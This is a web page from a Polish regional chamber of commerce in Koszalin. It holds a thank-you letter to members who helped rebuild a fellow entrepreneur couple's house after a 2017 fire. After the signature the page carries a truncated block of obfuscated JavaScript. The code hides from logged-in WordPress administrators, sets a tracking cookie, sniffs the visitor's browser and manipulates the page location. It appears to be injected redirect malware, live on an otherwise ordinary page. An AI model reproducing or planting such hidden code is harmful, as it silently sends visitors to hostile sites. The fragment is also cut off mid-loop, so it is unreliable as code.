Podziękowanie za wsparcie dla Danusi i Sławka | Północna Izba Gospodarcza w Koszalinie

PODZIĘKOWANIE

Drodzy Przedsiębiorcy, koleżanki i koledzy 8.stycznia 2017 roku w wyniku pożaru został zniszczony dom przedsiębiorców zrzeszonych w PIG – Catering Przymorze. Od tego czasu minął przeszło rok. dzięki ciężkiej pracy i determinacji naszych przyjaciół Danusi I Sławka a także Waszej pomocy udało się dom odbudować. Co prawda zostało jeszcze bardzo dużo pracy, prace wykończeniowe i instalacyjne ale mają wielką nadzieję że w tym roku będą mogli już w nim zamieszkać.

Ponieważ z ramienia PIG byłam koordynatorem w sprawie pomocy dla  naszych pogorzelców mogę powiedzieć że został zrobiony kawał dobrej roboty.

Wszystkie prace związane z odbudową ich domu były dokumentowane zdjęciowo a więc pozwolę sobie parę z nich  przedstawić i pokazać jak to wyglądało rok temu a jak wygląda teraz.

Jeszcze raz serdecznie w ich imieniu i swoim Wam dziękuję za to że nie zawiedliście ,że pokazaliście swoja z nimi solidarność . Niejednokrotnie tej pomocy nie da się przeliczyć na pieniądze bo była to pomoc niewymierna .

Kredo naszej Izby mówi o wzajemnej pomocy i tak też w tym przypadku się stało. Jeszcze raz wielkie dzięki!

Ewa Zemła

Wiceprezes PIG Koszalin

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m